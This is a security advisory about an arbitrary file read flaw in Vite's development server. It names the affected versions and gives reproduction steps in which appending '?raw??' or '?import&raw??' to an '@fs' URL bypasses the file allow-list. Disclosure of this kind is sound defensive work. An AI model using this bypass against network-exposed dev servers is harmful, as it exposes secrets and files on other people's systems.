Vite Arbitrary File Read Vulnerability via URL Query Parameters

A vulnerability in Vite allows the contents of arbitrary files to be accessed and returned to the browser. This issue affects versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. The vulnerability arises because the '@fs' directive normally restricts access to files outside of a designated allow list. However, appending '?raw??' or '?import&raw??' to the URL can bypass this restriction, exploiting a flaw in how query string separators are handled. Only applications that explicitly expose the Vite development server to the network are vulnerable.

Impact

Exploitation of this vulnerability could lead to unauthorized access to sensitive file contents, which would be returned to the user's browser.

Reproduction

To reproduce this vulnerability, create a new Vite project and start the development server. Once the server is running, add a file containing sensitive information, such as '/tmp/secret.txt', and attempt to access it through the Vite dev server using the '@fs' directive. The request will be denied with a '403 Restricted' response. However, adding '?import&raw??' to the URL will successfully retrieve the file's contents, demonstrating the bypass.

Remediation

Users can update to Vite versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 to address this vulnerability.